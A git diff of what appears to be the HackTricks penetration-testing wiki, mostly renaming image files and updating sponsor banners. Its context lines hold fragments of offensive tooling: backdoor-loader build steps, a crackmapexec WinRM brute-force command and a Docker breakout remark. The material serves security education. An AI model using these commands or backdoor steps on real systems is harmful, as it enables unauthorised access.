diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..e70bceed6
Binary files /dev/null and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png
index e70bceed6..2173ed0a4 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png
index 2173ed0a4..53e9f7c1f 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png
index 53e9f7c1f..0ea1b8586 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png
index 0ea1b8586..b38f1e7c3 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1) (1).png
index b38f1e7c3..0e554c193 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1) (1).png
index 0e554c193..a8cfa5b77 100644
Binary files a/.gitbook/assets/image (1) (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index a8cfa5b77..33c23d55b 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index 33c23d55b..bedca8e18 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index bedca8e18..a0a303a29 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..eaa792ed6
Binary files /dev/null and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png
index eaa792ed6..eb7611c98 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png
index eb7611c98..4ede9266b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png
index 4ede9266b..d7789e602 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png
index d7789e602..ca4b6651b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1) (1).png
index ca4b6651b..0330f840b 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1) (1).png b/.gitbook/assets/image (2) (1) (1) (1).png
index 0330f840b..8190e06a7 100644
Binary files a/.gitbook/assets/image (2) (1) (1) (1).png and b/.gitbook/assets/image (2) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1) (1).png b/.gitbook/assets/image (2) (1) (1).png
index 8190e06a7..0c49287b0 100644
Binary files a/.gitbook/assets/image (2) (1) (1).png and b/.gitbook/assets/image (2) (1) (1).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 0c49287b0..bedca8e18 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index bedca8e18..611702103 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..455fbb8b7
Binary files /dev/null and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png
index 455fbb8b7..6874f9c86 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png
index 6874f9c86..38b71f3d4 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png
index 38b71f3d4..7dcdeb084 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png
index 7dcdeb084..865dc4ae4 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1) (1).png
index 865dc4ae4..0d52048cb 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1) (1).png b/.gitbook/assets/image (3) (1) (1) (1).png
index 0d52048cb..b98c9fbbc 100644
Binary files a/.gitbook/assets/image (3) (1) (1) (1).png and b/.gitbook/assets/image (3) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1) (1).png b/.gitbook/assets/image (3) (1) (1).png
index b98c9fbbc..78abb7891 100644
Binary files a/.gitbook/assets/image (3) (1) (1).png and b/.gitbook/assets/image (3) (1) (1).png differ
diff --git a/.gitbook/assets/image (3) (1).png b/.gitbook/assets/image (3) (1).png
index 78abb7891..cdd56bb93 100644
Binary files a/.gitbook/assets/image (3) (1).png and b/.gitbook/assets/image (3) (1).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
index cdd56bb93..f406f4410 100644
Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png
new file mode 100644
index 000000000..2fde683ec
Binary files /dev/null and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png
index 2fde683ec..ea50c990a 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1) (1).png
index ea50c990a..bc4b76df1 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1) (1).png b/.gitbook/assets/image (4) (1) (1) (1).png
index bc4b76df1..8cd1f020d 100644
Binary files a/.gitbook/assets/image (4) (1) (1) (1).png and b/.gitbook/assets/image (4) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1) (1).png b/.gitbook/assets/image (4) (1) (1).png
index 8cd1f020d..c4dc34691 100644
Binary files a/.gitbook/assets/image (4) (1) (1).png and b/.gitbook/assets/image (4) (1) (1).png differ
diff --git a/.gitbook/assets/image (4) (1).png b/.gitbook/assets/image (4) (1).png
index c4dc34691..59ecb25fa 100644
Binary files a/.gitbook/assets/image (4) (1).png and b/.gitbook/assets/image (4) (1).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
index 59ecb25fa..0a0d96518 100644
Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 0a0d96518..f0efd5ebd 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index a73521062..358f92380 100644
--- a/README.md
+++ b/README.md
@@ -32,7 +32,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [RootedCON](https://www.rootedcon.com/)
-
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
@@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Intigriti](https://www.intigriti.com)
-
+
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
@@ -50,7 +50,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
### [Trickest](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.
diff --git a/backdoors/salseo.md b/backdoors/salseo.md
index 15a213697..453450c72 100644
--- a/backdoors/salseo.md
+++ b/backdoors/salseo.md
@@ -99,17 +99,17 @@ Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport]
- (1) (1) (1) (1) (1) (1) (1) (1).png>)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### Install DllExport for this project
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
- (1) (1) (1) (1) (1) (1) (1) (1).png>)
+ (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
- (1) (1) (1) (1) (1).png>)
+ (1) (1) (1) (1) (1) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
diff --git a/cryptography/certificates.md b/cryptography/certificates.md
index b7ff0623b..3dd3f4849 100644
--- a/cryptography/certificates.md
+++ b/cryptography/certificates.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -197,7 +197,7 @@ openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer
openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md
index 895626cf3..495f7d8cd 100644
--- a/forensics/basic-forensic-methodology/linux-forensics.md
+++ b/forensics/basic-forensic-methodology/linux-forensics.md
@@ -1,6 +1,6 @@
# Linux Forensics
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -161,7 +161,7 @@ icat -i raw -f ext4 disk.img 16
ThisisTheMasterSecret
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -224,7 +224,7 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
find /sbin/ –exec rpm -qf {} \; | grep "is not"
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -365,7 +365,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -451,7 +451,7 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
index 3fa478038..64995552a 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -231,7 +231,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
* [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
index 1b35e95aa..e1d4b0bb0 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -268,7 +268,7 @@ Opera **stores browser history and download data in the exact same format as Goo
* **Browser’s built-in anti-phishing:** `grep --color 'fraud_protection_enabled' ~/Library/Application Support/com.operasoftware.Opera/Preferences`
* **fraud\_protection\_enabled** should be **true**
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
index 675204742..ce7c1d8bb 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -113,7 +113,7 @@ Other tables inside this database contain more interesting information:
* **deleted\_fields**: Dropbox deleted files
* **date\_added**
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
index 5ce9d73eb..daa906b0b 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -92,7 +92,7 @@ Macro functions like `AutoOpen`, `AutoExec` or `Document_Open` will be **automat
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
index a2588dc2e..1865758bb 100644
--- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
+++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md
index 68499275a..69626acee 100644
--- a/generic-methodologies-and-resources/brute-force.md
+++ b/generic-methodologies-and-resources/brute-force.md
@@ -1,6 +1,6 @@
# Brute Force - CheatSheet
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -106,7 +106,7 @@ Finished in 0.920s.
* [**https://hashkiller.io/listmanager**](https://hashkiller.io/listmanager)
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists**](https://github.com/Karanxa/Bug-Bounty-Wordlists)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -466,7 +466,7 @@ set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
crackmapexec winrm -d -u usernames.txt -p passwords.txt
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -668,7 +668,7 @@ zip -r file.xls .
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -829,7 +829,7 @@ Cracking Common Application Hashes
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/README.md b/generic-methodologies-and-resources/python/README.md
index 64cd97197..a46305264 100644
--- a/generic-methodologies-and-resources/python/README.md
+++ b/generic-methodologies-and-resources/python/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -28,7 +28,7 @@ Get Access Today:
* [**Basic python web requests syntax**](web-requests.md)
* [**Basic python syntax and libraries**](basic-python.md)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/venv.md b/generic-methodologies-and-resources/python/venv.md
index 848b6c12b..7b7d9cb92 100644
--- a/generic-methodologies-and-resources/python/venv.md
+++ b/generic-methodologies-and-resources/python/venv.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -39,7 +39,7 @@ pip3 install wheel
inside the virtual environment
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/python/web-requests.md b/generic-methodologies-and-resources/python/web-requests.md
index 1eccc22b7..3a52385eb 100644
--- a/generic-methodologies-and-resources/python/web-requests.md
+++ b/generic-methodologies-and-resources/python/web-requests.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -119,7 +119,7 @@ term = Terminal()
term.cmdloop()
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/generic-methodologies-and-resources/search-exploits.md b/generic-methodologies-and-resources/search-exploits.md
index 30298ab86..b28fe2a6f 100644
--- a/generic-methodologies-and-resources/search-exploits.md
+++ b/generic-methodologies-and-resources/search-exploits.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -62,7 +62,7 @@ You can also search in vulners database: [https://vulners.com/](https://vulners.
This searches for exploits in other databases: [https://sploitus.com/](https://sploitus.com)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/privilege-escalation/docker-security/README.md b/linux-hardening/privilege-escalation/docker-security/README.md
index 878bcbf77..d8f5ccf18 100644
--- a/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -137,7 +137,7 @@ When I changed Docker host, I had to move the root keys and repository keys to o
***
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -450,7 +450,7 @@ If you have access to the docker socket or have access to a user in the **docker
* [https://en.wikipedia.org/wiki/Linux\_namespaces](https://en.wikipedia.org/wiki/Linux\_namespaces)
* [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index 1984e536a..4ab69bca0 100644
--- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -521,7 +521,7 @@ cat /proc/self/status | grep CapEff
The second technique explained in the post [https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.f-secure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
@@ -663,7 +663,7 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
* [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
+
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
diff --git a/linux-hardening/useful-linux-commands/README.md b/linux-hardening/useful-linux-commands/README.md
index 691e985b2..3c6860ab1 100644
--- a/linux-hardening/useful-linux-commands/README.md
+++ b/linux-hardening/useful-linux-commands/README.md
@@ -1,6 +1,6 @@
# Useful Linux Commands
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -141,7 +141,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
7z l file.zip
```
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -314,7 +314,7 @@ iptables -P OUTPUT ACCEPT
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
index cefc72b6d..6fc976b3e 100644
--- a/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md
@@ -12,7 +12,7 @@
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
@@ -366,7 +366,7 @@ If you are inside a filesystem with the **read-only and noexec protections** or
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
diff --git a/macos-hardening/macos-auto-start-locations.md b/macos-hardening/macos-auto-start-locations.md
index d42db0675..2e1b6fe2b 100644
--- a/macos-hardening/macos-auto-start-locations.md
+++ b/macos-hardening/macos-auto-start-locations.md
@@ -12,10 +12,31 @@
-Here are locations on the system that could lead to the **execution** of a binary **without** **user** **interaction**.
+This section is heavily based on the blog series [**Beyond the good ol' LaunchAgents**](https://theevilbit.github.io/beyond/), the goal is to add **more Autostart Locations** (if possible), indicate **which techniques are still working** nowadays with latest version of macOS (13.4) and to specify the **permissions** needed.
### Launchd
